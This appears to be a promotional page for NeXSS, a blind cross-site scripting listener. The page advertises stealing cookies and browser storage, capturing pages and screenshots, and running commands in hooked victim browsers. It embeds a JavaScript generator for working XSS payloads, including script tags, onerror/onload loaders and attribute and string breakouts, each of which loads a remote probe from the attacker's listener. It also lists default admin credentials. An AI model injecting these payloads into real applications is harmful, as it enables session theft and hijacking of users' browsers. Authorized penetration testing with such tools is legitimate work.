Modern Blind XSS Hunter & Listener
Everything you need for XSS hunting
NeXSS provides a comprehensive toolkit for security researchers and penetration testers to discover and validate blind XSS vulnerabilities.
Blind XSS Detection
Automatically captures comprehensive data when your payloads execute on target systems.
Screenshot Capture
Takes screenshots of the vulnerable page using html2canvas, a client-side DOM renderer (not a true browser screenshot, so cross-origin images without CORS headers may come out blank).
Cookie Extraction
Captures every cookie readable through document.cookie on the target domain for session analysis. Cookies flagged HttpOnly are not exposed to JavaScript and will not appear.
DOM Capture
Stores the full HTML content of the affected page for detailed analysis.
Storage Extraction
Captures localStorage and sessionStorage data from the compromised session.
Persistent Sessions
Maintains a connection to hooked browsers for real-time JavaScript command execution, for as long as the victim keeps the affected page open.
Traffic Interception
New! Observe HTTP requests and responses made from within the victim's browser session.
AES-256 Encryption
Encrypts the persistent-session command channel with AES-256.
Telegram Notifications
Real-time alerts with screenshots when XSS triggers, delivered to your Telegram.
Object Storage
Store screenshots in S3, MinIO, or Cloudflare R2 for scalable storage.
JWT Authentication
Dashboard session management with JSON Web Tokens, signed with the JWT_SECRET from the environment configuration.
Docker Ready
Easy deployment with Docker Compose. Get started in minutes, not hours.
Simple yet powerful workflow
NeXSS streamlines your XSS hunting process from payload deployment to post-exploitation.
Deploy Your Payloads
Configure your XSS payloads from the dashboard. NeXSS generates various payload formats ready for injection into target applications.
XSS Triggers
When a payload executes on a vulnerable application, NeXSS automatically captures screenshots, cookies, DOM content, and more.
Get Notified
Receive instant Telegram notifications with screenshot previews. Never miss a successful XSS trigger again.
Analyze & Execute
Review detailed reports in your dashboard. Use persistent sessions to execute commands in the victim's browser.
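The payload formats the dashboard generates are not listed on this page. As an added example (not NeXSS code), the following builds the common injection formats for a probe hosted on a listener, tags each one so the callback identifies which input fired, and checks that the callback URL is one a victim's browser can actually reach. The probe path /p.js and the t query parameter are assumptions made for this example.

```javascript
// Added example, not NeXSS code. Assumed: the probe script lives at /p.js on
// the listener and a `t` query parameter carries the injection-point tag.

// Warnings for a callback URL that victims' browsers cannot reach or that an
// https target page would block as mixed content.
function checkCallbackUrl(callback) {
  const warnings = [];
  let u;
  try {
    u = new URL(callback);
  } catch (e) {
    return ['not a valid absolute URL'];
  }
  if (u.protocol !== 'https:') {
    warnings.push('not https: an https target page will block the probe as mixed content');
  }
  const host = u.hostname;
  const privateV4 = /^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)/;
  if (host === 'localhost' || host === '127.0.0.1' || host === '[::1]' ||
      host.endsWith('.local') || privateV4.test(host)) {
    warnings.push(`${host} is not reachable from a victim's browser`);
  }
  return warnings;
}

// Probe URL with a tag naming the injection point, so a callback tells you
// which field fired rather than only that something did.
function probeUrl(callback, tag) {
  const u = new URL('/p.js', callback);
  if (tag) u.searchParams.set('t', tag);
  return u.toString();
}

// The usual contexts a blind payload lands in, keyed by context.
function payloadFormats(callback, tag) {
  const src = probeUrl(callback, tag);
  // Loader for event-handler attributes and JavaScript contexts.
  const loader = `var s=document.createElement('script');s.src='${src}';document.head.appendChild(s)`;
  return {
    // plain HTML body context
    script: `<script src=${src}></script>`,
    img: `<img src=x onerror="${loader}">`,
    svg: `<svg onload="${loader}">`,
    // breaking out of a double-quoted HTML attribute
    attrBreakout: `"><script src=${src}></script>`,
    // breaking out of a single-quoted string inside an existing <script>
    jsStringBreakout: `';${loader};//`,
    // values reflected into href or src attributes
    javascriptUrl: `javascript:${loader}`,
    // values that travel through a URL query string
    urlEncoded: encodeURIComponent(`<script src=${src}></script>`),
  };
}
```

Use a distinct tag per input (form field, header, profile attribute) when spraying payloads across an application; a blind trigger can fire hours later from an internal admin panel, and the tag is often the only clue to which injection point was responsible.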
Get started in minutes
Choose your preferred installation method. Docker is recommended for the easiest setup.
Quick Start with Docker
# Clone the repository
git clone https://github.com/mastomii/nexss.git
cd nexss
# Configure environment
cp .env.example .env
# Start the application
docker compose up -d
Environment Configuration
# Database
DATABASE_URL=postgresql://nexss:your_secure_password@db:5432/nexss
POSTGRES_USER=nexss
POSTGRES_PASSWORD=your_secure_password
POSTGRES_DB=nexss
# Authentication (generate with: openssl rand -hex 32)
JWT_SECRET=your_jwt_secret_here
NEXTAUTH_SECRET=your_nextauth_secret_here
NEXTAUTH_URL=http://localhost:3000
# Public URL for payload callbacks: this is what fired payloads call back to,
# so it must be reachable from victims' browsers and served over https
NEXT_PUBLIC_APP_URL=https://your-nexss-domain.com
Default Credentials
After installation, access the dashboard at http://localhost:3000
Username: admin
Password: admin123
⚡ Change the default password immediately after first login!
See NeXSS in action
A modern, intuitive interface designed for security professionals.

Dashboard Overview
Real-time statistics and recent reports at a glance
Ready to hunt Blind XSS?
Join security researchers worldwide using NeXSS to discover vulnerabilities. Deploy in minutes, start hunting immediately.
⚠️ Disclaimer
This tool is intended for authorized security testing only. Only use NeXSS against systems you have explicit permission to test. Unauthorized access to computer systems is illegal. The developers assume no liability for misuse of this software.